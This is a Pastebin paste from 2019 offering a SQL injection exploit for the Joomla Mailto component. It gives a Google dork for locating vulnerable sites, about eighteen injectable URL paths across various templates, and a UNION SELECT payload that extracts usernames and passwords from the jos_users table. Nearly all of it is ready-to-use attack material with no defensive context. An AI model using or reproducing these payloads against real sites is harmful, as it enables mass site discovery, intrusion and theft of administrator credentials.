Himeshvyas26

joomla exploit sql inj part 2

Feb 7th, 2019
346
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.18 KB | None | 0 0
  1. #H4M4573R
  2. ####################################################################
  3.  
  4. # Exploit Title : Joomla Mailto Components 1.2.2.2 SQL Injection
  5.  
  6.  
  7. # Exploit Risk : Medium
  8. # Google Dorks : inurl:''/index.php?option=com_mailto''
  9. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  10.  
  11.  
  12.  
  13. # SQL Injection Exploit :
  14. **********************
  15. /index.php?option=com_mailto&tmpl=[SQL Injection]
  16.  
  17. /index.php?option=com_mailto&tmpl=component&link=[SQL Injection]
  18.  
  19. /index.php?option=com_mailto&tmpl=component&type=raw&link=[SQL Injection]
  20.  
  21. /index.php?option=com_mailto&tmpl=mailto&article=[SQL Injection]&Itemid=1
  22.  
  23. /index.php?option=com_mailto&tmpl=mailto&article=[ID-NUMBER]&Itemid=[SQL Injection]
  24.  
  25. /index.php?option=com_mailto&tmpl=component&template=gantry&link=[SQL Injection]
  26.  
  27. /index.php?option=com_mailto&tmpl=component&template=skyextend-fjt&link=[SQL Injection]
  28.  
  29. /index.php?option=com_mailto&tmpl=component&template=kallyas&link=[SQL Injection]
  30.  
  31. /index.php?option=com_mailto&tmpl=component&template=ca_cloudbase2_j25&link=[SQL Injection]
  32.  
  33. /index.php?option=com_mailto&tmpl=component&template=jf_texturia&link=[SQL Injection]
  34.  
  35. /index.php?option=com_mailto&tmpl=component&template=jsn_boot_pro&link=[SQL Injection]
  36.  
  37. /index.php?option=com_mailto&tmpl=component&template=jm-business-marketing&link=[SQL Injection]
  38.  
  39. /index.php?option=com_mailto&tmpl=component&template=findario1.7&link=[SQL Injection]
  40.  
  41. /index.php?option=com_mailto&tmpl=component&template=beez_20&link=[SQL Injection]
  42.  
  43. /index.php?option=com_mailto&tmpl=component&template=allrounder-j1.6&link=[SQL Injection]
  44.  
  45. /index.php?option=com_mailto&tmpl=component&template=siteground-j16-41&link=[SQL Injection]
  46.  
  47. /index.php?option=com_mailto&tmpl=component&template=nagariknews&link=[SQL Injection]
  48.  
  49. /index.php?option=com_mailto&tmpl=component&template=sarmuni&link=[SQL Injection]
  50.  
  51. # Example SQL Injection Exploit Payload :
  52. *************************************
  53.  
  54. +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--
  55.  
  56. +and+1=2+union+select+concat(username,char(58),password)administrator+from+jos_users--&Itemid=1
  57.  
  58. ####################################################################
Add Comment
Please, Sign In to add comment